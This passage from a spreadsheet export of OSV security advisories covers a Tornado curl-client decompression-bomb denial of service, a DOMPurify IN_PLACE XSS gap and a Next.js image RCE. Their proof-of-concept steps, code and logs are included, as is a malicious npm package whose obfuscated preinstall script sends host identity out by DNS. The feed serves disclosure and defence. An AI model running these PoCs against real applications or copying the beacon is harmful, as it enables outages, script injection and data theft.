`SimpleAsyncHTTPClient.initialize()` defaults `max_buffer_size = 104857600` (100 MiB) with `max_body_size` defaulting to it (`simple_httpclient.py:117-121`); `CurlAsyncHTTPClient.initialize()` has no corresponding parameter at all.
Attack chain (attacker = malicious HTTP server; victim = any Tornado app doing `fetch()` on attacker-influenced URLs — URL fetchers, webhook processors, link previewers, RSS/probe pollers):
1. App configures `AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` (documented for proxy support; proxies are only supported with the curl client).
2. App calls `fetch("http://attacker/...")` with defaults → request advertises `Accept-Encoding: gzip,deflate`.
3. Attacker replies `200`, `Content-Encoding: gzip`, `Transfer-Encoding: chunked`, body = a gzip stream of zeros (4,174,525 wire bytes expanding to 4 GiB, 1029:1, sent in 64 KB chunks).
4. libcurl auto-decodes at ~350 MB/s into `buffer.write` with no size accounting → process RSS climbs linearly until OOM. The response need not complete: the client died with 2,818,048/4,174,525 wire bytes delivered (67%).
Variant without compression: `decompress_response=False` plus an endless streaming body (no Content-Length, no final chunk) feeds the same unaccounted `buffer.write` — this client never enforces any cap on any path.
## PoC
Verified end-to-end 2026-08-15 in a single container (cgroup `--memory 1g --memory-swap 1g` so the exhaustion endpoint is safe and fast to observe), two processes over a real TCP socket on `127.0.0.1:8081`: a raw-socket malicious server (`evil_server.py`, builds the 4 GiB-of-zeros gzip bomb once, serves it with chunked framing) and the Tornado victim (`victim_curl.py`, configures `CurlAsyncHTTPClient`, `fetch(..., request_timeout=300)`, samples `/proc/self/status` VmRSS every 0.2 s from a monitor thread so the curve survives the OOM kill).
### Build &amp; run the victim
```bash
git clone https://github.com/tornadoweb/tornado
cd tornado
pip install pycurl
python evil_server.py &amp;     # 127.0.0.1:8081; prints BOMB_BUILT wire_bytes=... ratio=... EVIL_LISTENING
python victim_curl.py       # victim: CurlAsyncHTTPClient fetch -&gt; expect linear RSS rise -&gt; OOM
python victim_simple.py     # control: default SimpleAsyncHTTPClient on the same bomb
```
Verified environment: debian:bookworm-slim, Python 3.11.2, python3-pycurl 7.45.2 (libcurl 7.88.1, zlib 1.2.13), tornado master snapshot `6.6.dev1` of 2026-08-15 run from the source tree (`sys.path`), container memory capped at 1 GiB. `curl_httpclient.py` verified byte-equivalent (still zero size-limit references) in tag `v6.5.8` and on master as of 2026-08-17.
### Reproduction steps
1. **Precondition — the documented curl-client deployment fetching a remote URL.** The vulnerability requires the application to use `CurlAsyncHTTPClient` (the standard configuration when proxy support or advanced TLS options are needed) with default `decompress_response=True`, and to fetch a URL whose server the attacker controls or has compromised. `victim_curl.py` implements exactly that (`AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")` → `fetch()`), and the server log confirms the ENCODING path engaged — the victim's request arrived with `User-Agent: Mozilla/5.0 (compatible; pycurl)` and `Accept-Encoding: gzip,deflate`.
2. **Attack:** start `evil_server.py`, wait for `EVIL_LISTENING`, then run `victim_curl.py` (the fetch itself is the attack; no further interaction).
3. **Expected:** `victim_curl_rss.log` shows VmRSS 30,884 → 1,032,100 kB over 3.18 s, rising ~350 MB/s with no plateau; the container kills the victim (`exit 137`, docker `OOMKilled=true`); the server logs `CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525` — the accumulation is bounded only by available memory, never by a client-side check, and the 4 GiB payload was never fully delivered.
4. **Variant:** with `decompress_response=False` and an unterminated chunked body (server keeps sending forever), the same `buffer.write` path accumulates unbounded plain bytes — no compression needed; `request_timeout` only extends the ceiling.
5. **Control:** `victim_simple.py` fetches the identical bomb with the default `SimpleAsyncHTTPClient` → clean `FETCH_FAILED: HTTP 599: Connection closed`, RSS peak ~65 MB (24,984 → 66,712 kB), script exit 0 — the CVE-2026-49855 accounting in `http1connection.py` aborts the transfer, proving the gap is specific to the curl client.
### PoC source
Full PoC source (**victim_curl.py**, stdlib only, no dependencies): [victim_curl.py](https://gist.github.com/afldl/211c0e7af8175c2eabab53ed037c435d) (secret gist, unlisted).
The gist carries `evil_server.py` (bomb server), `victim_curl.py` (victim), `victim_simple.py` (control), and `REPRODUCE.md`.
### Captured output (2026-08-15 run, verbatim excerpts)
```
evil_server.log:
BOMB_BUILT wire_bytes=4174525 decompressed_bytes=4294967296 ratio=1029:1
EVIL_LISTENING 127.0.0.1:8081
REQUEST_FROM 127.0.0.1:57544 -&gt; GET /bomb HTTP/1.1
REQUEST_HEADERS:
GET /bomb HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
WIRE_SENT 65536/4174525
WIRE_SENT 2162688/4174525
CLIENT_DIED_MID_TRANSFER wire_sent=2818048/4174525 err=ConnectionResetError(104, 'Connection reset by peer')
victim_curl_rss.log (VmRSS kB, every 0.2 s):
0.00  30884
0.61  231848
1.41  514720
2.22  794480
2.82 1000756
3.18 1032100        &lt;- last sample before kill
driver_f1.log:
timeout 240 python3 /e2e/F1/victim_curl.py ...  606 Killed
VICTIM_CURL_EXIT=137         # docker inspect -&gt; OomKilled: true
victim_simple.log (control, same bomb):
FETCH_FAILED: HTTP 599: Connection closed
SCRIPT_FINISHED_NORMALLY     # exit 0, VmRSS peak 66712 kB
```
Honest framing of the endpoint: the OOM kill at ~1008 MB was forced by the test's 1 GiB cgroup cap as the observation instrument; the "unbounded" claim rests on the linear no-plateau RSS curve, death at 67% wire delivery, and the absence of any size accounting in the code path — with more memory the transfer would have continued to the full 4 GiB payload.
## Impact
Denial of service (memory exhaustion) of any Tornado application that uses the curl HTTP client and fetches attacker-influenced URLs. A single ~4 MB response kills a 1 GiB process in ~3 s; wire cost scales as `available_memory / 1000`. Because the accumulation happens on the shared event loop's client, one malicious response takes down the entire application (all concurrently served users), and a slow endless-body variant drains memory gradually below detection thresholds. The attack requires no privileges, no user interaction, and only that the victim's configured client visits the attacker's origin.
### Suggested fix
Enforce a byte budget in the write path of `CurlAsyncHTTPClient`: wrap the `WRITEFUNCTION` (both the `buffer.write` branch and the `streaming_callback` branch) in a counter that aborts the transfer (`curl.setopt(pycurl.FAILONERROR)`-style cancellation or raising from the callback) once the received total exceeds `max_body_size`, plumbed from `initialize()` with the same 100 MiB default as `SimpleAsyncHTTPClient`. Because libcurl decompresses before the write callback, the counter naturally measures *decompressed* bytes — the same semantics as the CVE-2026-49855 fix. (`pycurl.MAXFILESIZE` alone is insufficient: it applies to the compressed transfer size.)
### Affected versions
- **&lt;= 6.5.8** (latest tag; the curl client has never had a response-size limit) and master (`6.6.dev1`, verified 2026-08-15/17).
- 6.5.6's CVE-2026-49855 fix covered `SimpleAsyncHTTPClient`/`http1connection.py` only; `curl_httpclient.py` was not touched.
## Credit
Reported by the diff/ambidiff security research effort (afldl).</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:dompurify</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr">
        <is>
          <t>3.4.16</t>
        </is>
      </c>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr"/>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>## Summary
In `IN_PLACE` mode DOMPurify sanitizes the caller's live DOM subtree directly. To close a known hazard (GHSA-55q2-fjhq-7xh7), the library neutralizes any node a hook detaches during sanitization by stripping its subtree's non-allow-listed attributes, but this neutralization is wired only into the `beforeSanitizeElements` and `uponSanitizeElement` hook sites. An `afterSanitizeElements` or `afterSanitizeAttributes` hook that removes a non-root element (a documented, supported pattern) detaches that element's subtree with no neutralization, so descendant `on*` handlers remain armed on the caller's live tree after `sanitize()` returns, yielding DOM XSS. No special privilege is required beyond supplying markup to an application that uses `IN_PLACE` together with a node-removing afterSanitize hook.
## Root Cause
`IN_PLACE` sanitization mutates the caller's live document, so any element a hook detaches from that tree must have its subtree neutralized before `sanitize()` returns; otherwise a queued resource-event handler (for example an `&lt;img onerror&gt;` that began loading when the caller built the tree) fires in page scope even though the handler never reached the sanitized output. The guard helper `_handleHookDetachedNode` (which calls `_neutralizeSubtree` in `IN_PLACE`) is invoked only after `beforeSanitizeElements` and after `uponSanitizeElement`. It is never invoked from the afterSanitize return paths, and `_sanitizeAttributes` never calls it at all. The post-walk `IN_PLACE` neutralization pass iterates only `DOMPurify.removed`, and hook-detached nodes are intentionally not recorded there, so that pass cannot reach them either.
```text
src/purify.ts
  _sanitizeElements: _handleHookDetachedNode present at lines 2142 and 2175
    (before/upon), absent after afterSanitizeElements at lines 2208 and 2249.
  _sanitizeAttributes: afterSanitizeAttributes fires at line 2670 with no
    detach re-check; the function never calls _handleHookDetachedNode.
  Post-walk IN_PLACE pass (lines 3081-3090) iterates DOMPurify.removed only,
    which by design (comment at lines 2096-2099) excludes hook-detached nodes.
```
## Impact
An attacker who supplies markup processed by a victim application that runs `DOMPurify.sanitize(node, { IN_PLACE: true })` and registers a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook can retain arbitrary `on*` event handlers on descendants of a removed non-root element. Because `IN_PLACE` operates on the caller's live document, a queued resource-event handler on such a descendant fires in the page origin after the synchronous `sanitize()` call returns, giving script execution in the victim's session (DOM XSS). This defeats DOMPurify's `IN_PLACE` contract to neutralize handlers on subtrees removed from the live tree. The capability is script execution in the victim origin; exact confidentiality and integrity effects depend on the hosting application's session.
## Proof of Concept
```text
Dependencies: Node.js and jsdom. The harness builds a live tree, registers a
removal hook, runs IN_PLACE sanitize(), then inspects whether the attacker
onerror handler survives on the detached descendant. jsdom does not perform
real image loads, so the retained handler (rather than an actual fired event)
is the observed hazard; the retained on* attribute on a live detached node
after a synchronous sanitize() return is the neutralization failure.
```
Reproduction steps:
1. Build a live subtree `#root &gt; section#wrap &gt; img[onerror]` where `#root` is the walk root and `section#wrap` is a non-root wrapper.
2. Register an `afterSanitizeElements` (or `afterSanitizeAttributes`) hook that calls `node.remove()` on the wrapper.
3. Call `DOMPurify.sanitize(root, { IN_PLACE: true })`.
4. Observe that the descendant `&lt;img&gt;` retains its `onerror` handler, whereas the same removal performed in a `beforeSanitizeElements`/`uponSanitizeElement` hook strips it.
```javascript
const { JSDOM } = require('jsdom');
const createDOMPurify = require('dompurify');
const { window } = new JSDOM('&lt;!DOCTYPE html&gt;&lt;body&gt;&lt;/body&gt;');
const DOMPurify = createDOMPurify(window);
const root = window.document.createElement('div');
root.id = 'root';
root.innerHTML = '&lt;section id="wrap"&gt;&lt;img src="x" onerror="ATTACKER()"&gt;&lt;/section&gt;';
window.document.body.appendChild(root);
DOMPurify.addHook('afterSanitizeElements', (node) =&gt; {
  if (node.id === 'wrap') node.remove();
});
DOMPurify.sanitize(root, { IN_PLACE: true });
// The detached &lt;img&gt; still carries its onerror handler:
console.log(root.querySelector('#wrap') === null,               // true (removed from live tree)
            !!window.document.querySelector('img[onerror]') ||  // handler survives on the detached node
            root.innerHTML);
```
```text
PASS: beforeSanitizeElements detach neutralizes descendant onerror (control)
PASS: uponSanitizeElement detach neutralizes descendant onerror (control)
PASS: without a removal hook the descendant onerror is stripped normally
PASS: afterSanitizeElements detach LEAVES descendant onerror armed (GAP)
PASS: afterSanitizeAttributes detach LEAVES descendant onerror armed (GAP)
PASS: kept custom element removed in afterSanitizeElements leaves descendant onerror armed (GAP)
```
## Attack Chain
1. **Exposure:** The victim application calls `DOMPurify.sanitize(liveNode, { IN_PLACE: true })` on attacker-influenced markup and has registered a node-removing `afterSanitizeElements` or `afterSanitizeAttributes` hook per an application policy (`src/purify.ts:3026` walk, `2136` element pass, `2522` attribute pass).
2. **Control:** The attacker controls the markup, including a non-root wrapper element and, inside it, a descendant carrying an `on*` resource-event handler such as `&lt;img src=x onerror=...&gt;`.
3. **Path:** The pre-order walk visits the wrapper before its descendants. During the wrapper's element or attribute pass the application hook detaches the wrapper from the live tree.
4. **Guard:** The detach-neutralization guard `_handleHookDetachedNode` runs only after `beforeSanitizeElements` (`2142`) and `uponSanitizeElement` (`2175`); it is absent after `afterSanitizeElements` (`2208`, `2249`) and is never called by `_sanitizeAttributes` (afterSanitizeAttributes at `2670`). The NodeIterator advances past the detached subtree, so the descendants are never revisited, and the post-walk pass iterates only `DOMPurify.removed`, which excludes hook-detached nodes.
5. **Primitive:** The descendant retains its `on*` handler on the caller's live document after `sanitize()` returns.
6. **Result:** The queued resource event fires the attacker handler in the victim page origin, achieving DOM XSS despite `IN_PLACE` sanitization.
## Bypass Evidence
The relevant prior fix is GHSA-55q2-fjhq-7xh7 ("IN_PLACE hook removal leaves a detached subtree executable, causing XSS"), whose change (`#1557`) added `_neutralizeSubtree` at the `beforeSanitizeElements` and `uponSanitizeElement` detach sites. Inspection of that change shows it touches no afterSanitize site: the diff adds the neutralization only at the before/upon locations, later refactored into `_handleHookDetachedNode` at `src/purify.ts:2142` and `2175`. A subsequent hardening change (`#1616`) added a `rootWasRemoved` throw and a neutralization sweep over `DOMPurify.removed`, but that sweep still iterates only `DOMPurify.removed`, which by design excludes hook-detached non-root nodes, so it does not close this gap. The `afterSanitizeElements`-on-kept-custom-element site at `2208` was itself introduced by the fix for GHSA-c2j3-45gr-mqc4 (`#1527`), adding another uncovered hook site.
Disproof attempts, all failed: (a) that a later release closed the afterSanitize gap, refuted by inspecting the published 3.4.13, 3.4.14, and 3.4.15 artifacts; (b) that detached descendants are revisited or re-sanitized, refuted at runtime (the `onerror` is retained only at the afterSanitize sites and stripped at the before/upon sites and with no removal hook); (c) that the post-walk pass catches hook-detached nodes, refuted by the design that excludes them from `DOMPurify.removed`; (d) that the precondition is contrived, refuted by parity with the accepted GHSA-55q2 threat model and the library's own supported pattern of removing a node inside `afterSanitizeElements`. The only edge not directly executed is the browser resource-event dispatch (jsdom performs no real image load); it is established by the proven retention of the live handler after a synchronous return, the library's own comments describing exactly this hazard, and parity with the accepted GHSA-55q2 mechanism.
## Affected Versions
- `Ecosystem: npm`
- `Package: dompurify`
- `Confirmed affected range: &gt;= 3.4.13, &lt;= 3.4.15`
- `Latest release checked: 3.4.15 (npm registry)`
- `Fix status: fixed in 3.4.16`
The before/upon detach neutralization introduced for GHSA-55q2-fjhq-7xh7 first shipped in 3.4.13; the residual afterSanitize gap was verified by reproducing it against the published npm artifacts for 3.4.13, 3.4.14, and 3.4.15. The 3.4.12 artifact predates that neutralization and behaves differently at the before/upon sites, so it is outside this specific incomplete-fix range. No release through 3.4.15 neutralizes detached subtrees at the afterSanitize sites, so no fixed version is established.
## Suggested Fix
Enforce the same `IN_PLACE` detach-neutralization invariant at every hook site that can detach a node, not only the before/upon sites. Concretely, apply a `_handleHookDetachedNode(currentNode, root)` re-check after `afterSanitizeElements` at both `src/purify.ts:2208` and `2249` (returning as removed when the node was detached), and add an equivalent `IN_PLACE` detach check plus `_neutralizeSubtree` after `afterSanitizeAttributes` at `2670`. As an interim mitigation without a code change, applications using `IN_PLACE` can avoid removing nodes inside `afterSanitizeElements`/`afterSanitizeAttributes` hooks and instead perform such removals in `beforeSanitizeElements`/`uponSanitizeElement`, or avoid `IN_PLACE` for attacker-influenced content.
Reported by zx (GitHub: @manus-pi).</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:next</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr">
        <is>
          <t>16.3.6</t>
        </is>
      </c>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr"/>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>## Impact
The Node.js `ImageResponse` implementation from `next/og` is affected by an upstream vulnerability. This can lead to remote code execution.
Affected applications pass attacker-controlled values into SVG content, attributes, or styles during image generation:
```tsx
import { ImageResponse } from 'next/og'
export async function GET(request: Request) {
  const value = new URL(request.url).searchParams.get('value') ?? ''
  return new ImageResponse(
    &lt;svg width="1200" height="630"&gt;
      &lt;title&gt;{value}&lt;/title&gt;
    &lt;/svg&gt;
  )
}
```
Applications using the Edge `ImageResponse` implementation, or applications that do not pass attacker-controlled values into SVG content, attributes, or styles, are not affected.
## Workaround
If upgrading is not immediately possible, do not pass attacker-controlled values into SVG content, attributes, or styles rendered by the Node.js `ImageResponse` implementation from `next/og`.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17339</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="inlineStr"/>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>npm, react</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>npm:reactjs-risk</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr"/>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0e58c82916c5199ef9e73a5d70f91d120312151eb5c28090d8bbf6dbf4117543)
The package's preinstall lifecycle script collects host identity metadata from the installer machine — os.hostname(), the output of `whoami`/os.userInfo().username, and os.platform() — hex-encodes the values, and issues a DNS A-record lookup for `&lt;hex&gt;.768hgkqn53abdemu8ikzkel4g.canarytokens.com`, causing the installer's hostname, username, and platform to be transmitted to the canarytoken operator on every `npm install`. The dns module is loaded via string concatenation (`'d'+'n'+'s'`) and the `whoami` command is similarly split, indicating deliberate obfuscation of the module and command names. The package's declared main entry is an empty stub with no library functionality, so the preinstall beacon is the package's only behavior. Installing this package auto-executes an unauthenticated exfiltration of installer identity metadata to a third-party DNS endpoint the installer did not opt into.
## Source: ossf-package-analysis (a32a318956967c92b753750e0b607e48db7eef07d05f25c2b687f3b9612f806e)
The OpenSSF Package Analysis project identified 'reactjs-risk' @ 99.17.1 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17339</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17340</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:@astracode/byles-new</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr"/>
      <c r="S4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@astracode/byles-new (npm), version(s): 0.1.37, 0.1.36, 0.1.35, 0.1.3, 0.0.99, 0.1.2, 0.1.1, 0.1.0.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17340</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17341</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>npm:@badzz88/baileys</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr"/>
      <c r="S4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@badzz88/baileys (npm), version(s): 8.5.9, 8.5.7, 8.5.5, 8.5.4, 8.5.3, 8.5.2, 8.5.1.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17341</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17342</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/belbails</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr"/>
      <c r="S4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@bellaxchuu/belbails (npm), version(s): 1.0.1.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17342</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr"/>
      <c r="S4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@bellaxchuu/crystalred (npm), version(s): 0.1.2.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17344</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/familyxtrx</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr"/>
      <c r="S4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@bellaxchuu/familyxtrx (npm), version(s): 0.1.5.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17344</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17345</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
